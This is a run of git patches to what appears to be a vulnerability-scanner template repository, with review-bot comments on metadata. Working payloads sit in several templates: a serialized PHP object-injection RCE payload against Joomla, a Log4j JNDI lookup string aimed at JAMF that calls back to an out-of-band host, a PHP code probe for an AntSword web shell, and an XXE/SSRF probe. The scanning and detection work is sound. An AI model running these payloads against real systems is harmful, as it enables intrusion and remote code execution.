From 77e1fa8c08433bbd22892abde1789a8fe500cf09 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jan 2022 10:22:47 +0000 Subject: [PATCH 01/49] Auto Generated CVE annotations [Sat Jan 8 10:22:47 UTC 2022] :robot: --- cves/2021/CVE-2021-45232.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-45232.yaml b/cves/2021/CVE-2021-45232.yaml index 4aedc4845e..d524c6ff99 100644 --- a/cves/2021/CVE-2021-45232.yaml +++ b/cves/2021/CVE-2021-45232.yaml @@ -3,7 +3,7 @@ id: CVE-2021-45232 info: name: Apache APISIX Dashboard api unauth access author: Mr-xn - severity: high + severity: critical description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication. reference: - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ @@ -12,6 +12,11 @@ info: - https://twitter.com/403Timeout/status/1475715079173976066 - https://github.com/wuppp/cve-2021-45232-exp tags: cve,cve2021,apache,unauth,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 requests: - method: GET From be75b507ab3f5f6cc41d4176dec96d63d3f98f38 Mon Sep 17 00:00:00 2001 From: Valerio Preti Date: Thu, 20 Jan 2022 09:39:19 +0100 Subject: [PATCH 02/49] Create check for Rusty Joomla RCE --- vulnerabilities/joomla/rusty_joomla.yaml | 46 ++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 vulnerabilities/joomla/rusty_joomla.yaml diff --git a/vulnerabilities/joomla/rusty_joomla.yaml b/vulnerabilities/joomla/rusty_joomla.yaml new file mode 100644 index 0000000000..22b3f00155 --- /dev/null +++ b/vulnerabilities/joomla/rusty_joomla.yaml 
@@ -0,0 +1,46 @@ +id: rusty-joomla + +info: + name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS + author: leovalcante, kiks7 + severity: critical + description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution. + reference: + - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ + - https://github.com/kiks7/rusty_joomla_rce + tags: joomla,rce,unauthenticated + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: N/A + + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Fl4m3rz.l337%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + + redirects: true + cookie-reuse: true + extractors: + - type: regex + name: csrf + part: body + internal: true + group: 1 + regex: + - " Date: Fri, 21 Jan 2022 12:39:28 +0530 Subject: [PATCH 03/49] Update and rename rusty_joomla.yaml to rusty-joomla.yaml --- .../joomla/{rusty_joomla.yaml => rusty-joomla.yaml} | 8 ++------ 1 
file changed, 2 insertions(+), 6 deletions(-) rename vulnerabilities/joomla/{rusty_joomla.yaml => rusty-joomla.yaml} (91%) diff --git a/vulnerabilities/joomla/rusty_joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml similarity index 91% rename from vulnerabilities/joomla/rusty_joomla.yaml rename to vulnerabilities/joomla/rusty-joomla.yaml index 22b3f00155..71171cf43a 100644 --- a/vulnerabilities/joomla/rusty_joomla.yaml +++ b/vulnerabilities/joomla/rusty-joomla.yaml @@ -2,17 +2,13 @@ id: rusty-joomla info: name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS - author: leovalcante, kiks7 + author: leovalcante,kiks7 severity: critical description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution. reference: - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ - https://github.com/kiks7/rusty_joomla_rce - tags: joomla,rce,unauthenticated - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: N/A + tags: joomla,rce,unauth,php,cms requests: From a96f336f15c35f9eaa0199840b9a23e9ab8280f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jan 2022 08:23:33 +0000 Subject: [PATCH 04/49] Auto Generated CVE annotations [Tue Jan 25 08:23:33 UTC 2022] :robot: --- cves/2022/CVE-2022-23178.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2022/CVE-2022-23178.yaml b/cves/2022/CVE-2022-23178.yaml index 39e59ad58c..55ef1dbfa8 100644 --- a/cves/2022/CVE-2022-23178.yaml +++ b/cves/2022/CVE-2022-23178.yaml 
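Review bot: The rename hunk in rusty-joomla.yaml removes the whole `classification` block along with the `cve-id: N/A` entry, so the CVSS vector and score are lost rather than corrected. If the intent was only to drop the invalid `cve-id` value, keeping `cvss-metrics` and `cvss-score` and omitting `cve-id` would preserve the scoring metadata that the other templates in this series carry. The `requests` section the hunk ends on continues outside the hunk.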
@@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-23178 - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E tags: cve,cve2022,crestron,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-23178 + cwe-id: CWE-287 requests: - method: GET From d59a6c601796cda0259b0484c73e0b4701cc78cd Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 28 Jan 2022 16:04:06 +0530 Subject: [PATCH 05/49] Added Deadbolt Ransomware Detection --- .../ransomware/deadbolt-ransomware.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 vulnerabilities/ransomware/deadbolt-ransomware.yaml diff --git a/vulnerabilities/ransomware/deadbolt-ransomware.yaml b/vulnerabilities/ransomware/deadbolt-ransomware.yaml new file mode 100644 index 0000000000..f0baa2ef88 --- /dev/null +++ b/vulnerabilities/ransomware/deadbolt-ransomware.yaml @@ -0,0 +1,16 @@ +id: deadbolt-ransomware + +info: + name: Deadbolt Ransomware Detection + author: pdteam + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." \ No newline at end of file From b34e390f2fa39e4d556fbb9820f3cf346a64920e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 28 Jan 2022 15:57:06 -0500 Subject: [PATCH 06/49] Enhancement: exposed-panels/joomla-panel.yaml by cs --- exposed-panels/joomla-panel.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/joomla-panel.yaml b/exposed-panels/joomla-panel.yaml index bef3cb248d..50d4575553 100644 --- a/exposed-panels/joomla-panel.yaml +++ b/exposed-panels/joomla-panel.yaml @@ -1,7 +1,7 @@ id: joomla-panel info: - name: Joomla Panel + name: Joomla! Panel author: its0x08 severity: info tags: panel,joomla 
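Review bot: `severity: info` in deadbolt-ransomware.yaml undersells what the template reports: a match means the host is already serving a DEADBOLT ransom note, i.e. an active compromise, and `info` findings are routinely filtered out of scan output, so `severity: high` (or at least `medium`) would surface it. The `info` block also has no `description` or `reference`, e.g. `description: Detects the DEADBOLT ransomware lock page served by an infected device.` The word matcher sets no `part` (presumably body by default, worth making explicit with `part: body`), and the file lacks a trailing newline.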
@@ -16,3 +16,5 @@ requests: - '' - '/administrator/templates/isis/images/joomla.png' condition: or + +# Enhanced by cs on 2022/01/28 From 8aa51fb6502399e19a5dd904b63b12b195c5c03a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Mon, 31 Jan 2022 09:43:11 -0500 Subject: [PATCH 07/49] Enhancement: workflows/joomla-workflow.yaml by cs --- workflows/joomla-workflow.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/workflows/joomla-workflow.yaml b/workflows/joomla-workflow.yaml index 634da9d0f3..f9ab969abe 100644 --- a/workflows/joomla-workflow.yaml +++ b/workflows/joomla-workflow.yaml @@ -1,7 +1,7 @@ id: joomla-workflow info: - name: Joomla Security Checks + name: Joomla! Security Checks author: daffainfo description: A simple workflow that runs all Joomla related nuclei templates on a given target. @@ -10,4 +10,5 @@ workflows: matchers: - name: joomla subtemplates: - - tags: joomla \ No newline at end of file + - tags: joomla +# Enhanced by cs on 2022/01/31 From e5a77aa803e7989b0e673bf9c3f31f07813b1137 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Feb 2022 01:39:46 +0530 Subject: [PATCH 08/49] Create antsword-backdoor.yaml --- vulnerabilities/other/antsword-backdoor.yaml | 39 ++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/other/antsword-backdoor.yaml diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml new file mode 100644 index 0000000000..6e3641e755 --- /dev/null +++ b/vulnerabilities/other/antsword-backdoor.yaml 
@@ -0,0 +1,39 @@ +id: antsword-backdoor + +info: + name: AntSword_bypass_disable_functions_shell + author: ffffffff0x + severity: critical + description: | + 蚁剑「绕过 disable_functions」插件生成的 shell + reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + tags: backdoor + +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=phpinfo();' + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + - "Zend" + - "探针" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' From e1b8bf3da287792b79342b0b495629272c5a7e9d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Feb 2022 01:52:39 +0530 Subject: [PATCH 09/49] Update antsword-backdoor.yaml --- vulnerabilities/other/antsword-backdoor.yaml | 23 +++++--------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml index 6e3641e755..6202b0feb0 100644 --- a/vulnerabilities/other/antsword-backdoor.yaml +++ b/vulnerabilities/other/antsword-backdoor.yaml @@ -1,13 +1,12 @@ id: antsword-backdoor info: - name: AntSword_bypass_disable_functions_shell + name: Antsword backdook author: ffffffff0x severity: critical - description: | - 蚁剑「绕过 disable_functions」插件生成的 shell + description: 蚁剑「绕过 disable_functions」插件生成的 shell reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - tags: backdoor + tags: backdoor,antsword requests: - method: POST 
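Review bot: The new `name: Antsword backdook` in antsword-backdoor.yaml (patch 09, first hunk) has a typo and should read `name: AntSword backdoor`. The `description` remains Chinese only; an English rendering such as `description: Detects the web shell generated by the AntSword "bypass disable_functions" plugin.` would keep the template searchable alongside the rest of the corpus, and the single scalar `reference` would be more consistent with the other templates as a list item. The `requests` block begins at the end of this hunk and continues in the next.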
@@ -15,25 +14,15 @@ requests: - "{{BaseURL}}/.antproxy.php" headers: Content-Type: application/x-www-form-urlencoded - body: 'ant=phpinfo();' + body: 'ant=echo md5("antproxy.php");' matchers-condition: and matchers: - type: word + part: body words: - - "PHP Extension" - - "PHP Version" - - "Zend" - - "探针" - condition: or + - "951d11e51392117311602d0c25435d7f" - type: status status: - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' From ab1291ec13c051c82a9645d9f2dd26dff85e9f5e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 1 Feb 2022 15:25:52 +0530 Subject: [PATCH 10/49] Added JAMF Log4j JNDI RCE Template --- vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml diff --git a/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..dacfc7651f --- /dev/null +++ b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -0,0 +1,38 @@ +id: jamf-log4j-jndi-rce + +info: + name: JAMF Log4j JNDI RCE + author: pdteam + severity: critical + reference: https://github.com/random-robbie/jamf-log4j + tags: rce,jndi,log4j,jamf + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 
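Review bot: The matcher word `951d11e51392117311602d0c25435d7f` in antsword-backdoor.yaml is an unexplained constant whose relation to the request body `ant=echo md5("antproxy.php");` should be recorded inline, e.g. `- "951d11e51392117311602d0c25435d7f"  # md5("antproxy.php") echoed back by the shell`, so the next editor can regenerate it if the probe string changes. The hunk also drops the version extractor, so a positive result no longer records the PHP version; that may be intended but the commit message does not say so.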
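Review bot: jamf-log4j-jndi-rce.yaml has no `description` and no `classification`, and its only `reference` is an exploit repository, unlike the other templates in this series; at minimum add a `description:` stating that the JAMF login form is checked for a Log4j JNDI lookup via an out-of-band DNS interaction, and a `classification` with the relevant `cve-id` (<CVE id placeholder>). The comment `# Confirms the DNS Interaction` would be more useful if it said that the `and` with the four-label regex on `interactsh_request` is what separates a real `${hostName}` expansion from a bare resolution of the callback domain; as written a reader may assume the DNS hit alone is the finding.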
From b6db35de8bc74b3d92fdad6e56da2d902cf68124 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 1 Feb 2022 15:38:37 +0530 Subject: [PATCH 11/49] Added JAMF Panel detection --- exposed-panels/jamf-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/jamf-panel.yaml diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml new file mode 100644 index 0000000000..aeffbaed7a --- /dev/null +++ b/exposed-panels/jamf-panel.yaml @@ -0,0 +1,25 @@ +id: jamf-panel + +info: + name: JAMF MDM Panel + author: pdteam + severity: info + metadata: + shodan-query: http.favicon.hash:1262005940 + tags: jamf,panel,mdm + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: all + words: + - "Jamf Pro Login" + - "Jamf Cloud Node" + condition: or \ No newline at end of file From c68f4762b34f523c08c03465b5facd26275cb5ef Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 1 Feb 2022 16:10:51 +0530 Subject: [PATCH 12/49] Added JAMF Blind XXE --- vulnerabilities/jamf/jamf-blind-xxe.yaml | 50 ++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 vulnerabilities/jamf/jamf-blind-xxe.yaml diff --git a/vulnerabilities/jamf/jamf-blind-xxe.yaml b/vulnerabilities/jamf/jamf-blind-xxe.yaml new file mode 100644 index 0000000000..f7d6678361 --- /dev/null +++ b/vulnerabilities/jamf/jamf-blind-xxe.yaml 
@@ -0,0 +1,50 @@ +id: jamf-blind-xxe + +info: + name: JAMF Blind XXE / SSRF + author: pdteam + severity: medium + reference: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ + tags: xxe,ssrf,jamf + +requests: + - raw: + - | + POST /client HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + + + &test; + + + com.jamfsoftware.jamfdistributionserver + {{unix_time()}} + + 00000000-0000-0000-0000-000000000000 + com.jamfsoftware.jamf.distributionserverinventoryrequest + + 1999 + {{unix_time()}} + + + + 34 + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "http" + + - type: word + words: + - "com.jamfsoftware.jss" \ No newline at end of file From b7c2f9c484a730fb12b3d60980e2b39618a1ff1c Mon Sep 17 00:00:00 2001 From: nielsing Date: Tue, 1 Feb 2022 16:59:43 +0000 Subject: [PATCH 13/49] Adding .axd extensions to all paths --- .../telerik/telerik-dialoghandler-detect.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 6342e702d6..53dacb623f 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml 
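Review bot: In jamf-blind-xxe.yaml the second matcher `words: - "com.jamfsoftware.jss"` has no `part`, while the first explicitly targets `interactsh_protocol`; add `part: body` so the intent is explicit rather than relying on the default. The XML body of the raw request appears mangled on this page (only `&test;` of the entity reference survives), so the request itself cannot be reviewed here. The template also lacks a `description`, and the file has no trailing newline.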
@@ -28,6 +28,22 @@ requests: - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.axd?dp=1' + - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.axd?dp=1' + - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.axd?dp=1' + - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.axd/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.axd?dp=1' stop-at-first-match: true matchers-condition: and From c052b84ffc63bc7a9ac1ddd8af15f44cb0b31742 Mon Sep 17 00:00:00 2001 
From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 1 Feb 2022 13:09:32 -0500 Subject: [PATCH 14/49] Enhancement: cves/2014/CVE-2014-8682.yaml by mp --- cves/2014/CVE-2014-8682.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml index 54f4490459..25191e9b29 100644 --- a/cves/2014/CVE-2014-8682.yaml +++ b/cves/2014/CVE-2014-8682.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDK severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + remediation: reference: - http://www.securityfocus.com/bid/71187 - http://seclists.org/fulldisclosure/2014/Nov/33 @@ -34,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/01 From a5811de4f081d054bbbcc1d3cc5d8c69283d9539 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Feb 2022 00:30:39 +0530 Subject: [PATCH 15/49] Update telerik-dialoghandler-detect.yaml --- .../telerik/telerik-dialoghandler-detect.yaml | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 53dacb623f..3a05b8baa4 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml 
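Review bot: The added `remediation:` line in CVE-2014-8682.yaml has no value, so the key parses as `null`; either give it content (the description already names the fixed build, e.g. `remediation: Upgrade to Gogs 0.5.6.1105 Beta or later.`) or leave the key out until there is something to say. An empty key on every "enhanced" template makes schema validation and grepping for missing remediation harder rather than easier.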
@@ -29,21 +29,6 @@ requests: - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.axd?dp=1' - - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.axd?dp=1' - - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.axd?dp=1' - - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.axd/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.axd?dp=1' stop-at-first-match: true matchers-condition: and From 2cf1bb016c21e73b8c156f92d8116f868b1dfe27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Feb 2022 00:34:39 +0530 Subject: [PATCH 16/49] Update telerik-dialoghandler-detect.yaml --- technologies/telerik/telerik-dialoghandler-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 3a05b8baa4..a4275c7790 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -2,7 +2,7 @@ id: telerik-dialoghandler-detect info: name: Detect Telerik Web UI Dialog Handler - author: organiccrap,zhenwarx + author: organiccrap,zhenwarx,nielsing severity: info reference: - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html From ec94360afdf31a18a18ec23f82b3034617739bca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Feb 2022 02:00:09 +0530 Subject: [PATCH 17/49] Update rusty-joomla.yaml --- vulnerabilities/joomla/rusty-joomla.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/joomla/rusty-joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml index 71171cf43a..662a4d5b87 100644 --- a/vulnerabilities/joomla/rusty-joomla.yaml +++ b/vulnerabilities/joomla/rusty-joomla.yaml @@ -8,8 +8,7 @@ info: reference: - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ - https://github.com/kiks7/rusty_joomla_rce - tags: joomla,rce,unauth,php,cms - + tags: joomla,rce,unauth,php,cms,objectinjection requests: - raw: 
@@ -22,9 +21,10 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Fl4m3rz.l337%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + 